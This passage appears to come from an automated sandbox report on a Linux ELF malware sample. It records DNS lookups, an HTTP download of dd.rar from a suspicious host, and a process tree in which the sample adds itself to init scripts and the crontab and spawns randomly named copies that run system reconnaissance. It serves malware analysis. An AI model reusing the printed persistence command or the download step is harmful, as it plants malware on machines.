Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		142.4.106.75	A (IP address)	IN (0x0001)	false
Oct 26, 2023 20:31:08.505925894 CEST	8.8.8.8	192.168.2.23	0x829c	No error (0)	ppp.xxxatat456.com		192.74.236.35	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www1.gggatat456.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	43268	142.0.138.41	80

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2023 20:30:47.799531937 CEST	0	OUT	GET /dd.rar HTTP/1.1 Accept: / Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322) Host: www1.gggatat456.com Connection: Keep-Alive

System Behavior

Analysis Process: 1.elf PID: 6204, Parent PID: 6121

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	/tmp/1.elf
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6205, Parent PID: 6204

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6206, Parent PID: 6205

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6207, Parent PID: 6206

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6208, Parent PID: 6205

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6209, Parent PID: 6208

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: update-rc.d PID: 6209, Parent PID: 1860

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/sbin/update-rc.d
Arguments:	update-rc.d 1.elf defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 6215, Parent PID: 6209

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 6215, Parent PID: 6209

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: 1.elf PID: 6210, Parent PID: 6205

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: sh PID: 6210, Parent PID: 6205

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6211, Parent PID: 6210

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6211, Parent PID: 6210

General

Start time (UTC):	18:30:46
Start date (UTC):	26/10/2023
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: 1.elf PID: 6238, Parent PID: 6205

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6239, Parent PID: 6238

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6239, Parent PID: 6238

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	/usr/bin/ccxfvtbhgr su 6205
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6240, Parent PID: 6239

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	-
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: 1.elf PID: 6241, Parent PID: 6205

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6242, Parent PID: 6241

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6242, Parent PID: 6241

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	/usr/bin/ccxfvtbhgr "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6243, Parent PID: 6242

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	-
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: 1.elf PID: 6244, Parent PID: 6205

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6245, Parent PID: 6244

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6245, Parent PID: 6244

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	/usr/bin/ccxfvtbhgr whoami 6205
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6248, Parent PID: 6245

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	-
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: 1.elf PID: 6246, Parent PID: 6205

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6247, Parent PID: 6246

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6247, Parent PID: 6246

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	/usr/bin/ccxfvtbhgr ifconfig 6205
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6251, Parent PID: 6247

General

Start time (UTC):	18:30:52
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	-
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: 1.elf PID: 6249, Parent PID: 6205

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6250, Parent PID: 6249

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6250, Parent PID: 6249

General

Start time (UTC):	18:30:51
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	/usr/bin/ccxfvtbhgr "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: ccxfvtbhgr PID: 6252, Parent PID: 6250

General

Start time (UTC):	18:30:52
Start date (UTC):	26/10/2023
Path:	/usr/bin/ccxfvtbhgr
Arguments:	-
File size:	625878 bytes
MD5 hash:	6a5eca188339a325e9ac1189dbb89376

Chronological Activities

Analysis Process: 1.elf PID: 6257, Parent PID: 6205

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6258, Parent PID: 6257

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6258, Parent PID: 6257

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	/usr/bin/ezztyrfjzf "cat resolv.conf" 6205
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6259, Parent PID: 6258

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	-
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: 1.elf PID: 6260, Parent PID: 6205

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6261, Parent PID: 6260

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6261, Parent PID: 6260

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	/usr/bin/ezztyrfjzf ifconfig 6205
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6262, Parent PID: 6261

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	-
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: 1.elf PID: 6263, Parent PID: 6205

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6264, Parent PID: 6263

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6264, Parent PID: 6263

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	/usr/bin/ezztyrfjzf ls 6205
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6267, Parent PID: 6264

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	-
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: 1.elf PID: 6265, Parent PID: 6205

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6266, Parent PID: 6265

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6266, Parent PID: 6265

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	/usr/bin/ezztyrfjzf "ps -ef" 6205
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6270, Parent PID: 6266

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	-
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: 1.elf PID: 6268, Parent PID: 6205

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6269, Parent PID: 6268

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6269, Parent PID: 6268

General

Start time (UTC):	18:30:57
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	/usr/bin/ezztyrfjzf "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: ezztyrfjzf PID: 6271, Parent PID: 6269

General

Start time (UTC):	18:30:58
Start date (UTC):	26/10/2023
Path:	/usr/bin/ezztyrfjzf
Arguments:	-
File size:	625878 bytes
MD5 hash:	9e1504dcb6964dbc17834520c7a967c0

Chronological Activities

Analysis Process: 1.elf PID: 6274, Parent PID: 6205

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6275, Parent PID: 6274

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: dyuvutukki PID: 6275, Parent PID: 6274

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	/usr/bin/dyuvutukki "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: dyuvutukki PID: 6276, Parent PID: 6275

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	-
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: 1.elf PID: 6277, Parent PID: 6205

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6278, Parent PID: 6277

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: dyuvutukki PID: 6278, Parent PID: 6277

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	/usr/bin/dyuvutukki "cat resolv.conf" 6205
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: dyuvutukki PID: 6280, Parent PID: 6278

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	-
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: 1.elf PID: 6279, Parent PID: 6205

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6281, Parent PID: 6279

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: dyuvutukki PID: 6281, Parent PID: 6279

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	/usr/bin/dyuvutukki "ifconfig eth0" 6205
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: dyuvutukki PID: 6283, Parent PID: 6281

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	-
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: 1.elf PID: 6282, Parent PID: 6205

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6284, Parent PID: 6282

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: dyuvutukki PID: 6284, Parent PID: 6282

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	/usr/bin/dyuvutukki id 6205
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: dyuvutukki PID: 6287, Parent PID: 6284

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	-
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: 1.elf PID: 6285, Parent PID: 6205

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6286, Parent PID: 6285

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: dyuvutukki PID: 6286, Parent PID: 6285

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	/usr/bin/dyuvutukki uptime 6205
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: dyuvutukki PID: 6288, Parent PID: 6286

General

Start time (UTC):	18:31:03
Start date (UTC):	26/10/2023
Path:	/usr/bin/dyuvutukki
Arguments:	-
File size:	625878 bytes
MD5 hash:	0aca8cf23a8c3e87b13a9c7043110017

Chronological Activities

Analysis Process: 1.elf PID: 6312, Parent PID: 6205

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6313, Parent PID: 6312

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vapcvdizxx PID: 6313, Parent PID: 6312

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	/usr/bin/vapcvdizxx "route -n" 6205
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: vapcvdizxx PID: 6314, Parent PID: 6313

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: 1.elf PID: 6315, Parent PID: 6205

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6316, Parent PID: 6315

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vapcvdizxx PID: 6316, Parent PID: 6315

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	/usr/bin/vapcvdizxx top 6205
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: vapcvdizxx PID: 6319, Parent PID: 6316

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: 1.elf PID: 6317, Parent PID: 6205

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6318, Parent PID: 6317

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vapcvdizxx PID: 6318, Parent PID: 6317

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	/usr/bin/vapcvdizxx su 6205
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: vapcvdizxx PID: 6322, Parent PID: 6318

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: 1.elf PID: 6320, Parent PID: 6205

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6321, Parent PID: 6320

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vapcvdizxx PID: 6321, Parent PID: 6320

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	/usr/bin/vapcvdizxx "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: vapcvdizxx PID: 6325, Parent PID: 6321

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: 1.elf PID: 6323, Parent PID: 6205

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6324, Parent PID: 6323

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vapcvdizxx PID: 6324, Parent PID: 6323

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	/usr/bin/vapcvdizxx top 6205
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: vapcvdizxx PID: 6326, Parent PID: 6324

General

Start time (UTC):	18:31:09
Start date (UTC):	26/10/2023
Path:	/usr/bin/vapcvdizxx
Arguments:	-
File size:	625878 bytes
MD5 hash:	a5394a1ee3b201dfd0198300b6604608

Chronological Activities

Analysis Process: 1.elf PID: 6329, Parent PID: 6205

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6330, Parent PID: 6329

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6330, Parent PID: 6329

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	/usr/bin/lkzqkklpfr "cd /etc" 6205
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6331, Parent PID: 6330

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	-
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: 1.elf PID: 6332, Parent PID: 6205

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6333, Parent PID: 6332

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6333, Parent PID: 6332

General

Start time (UTC):	18:31:15
Start date (UTC):	26/10/2023
Path:	/usr/bin/lkzqkklpfr
Arguments:	/usr/bin/lkzqkklpfr whoami 6205
File size:	625878 bytes
MD5 hash:	26d5465cc1a2caff5bb4ee89004cbcae

Chronological Activities

Analysis Process: lkzqkklpfr PID: 6334, Parent PID: 6333

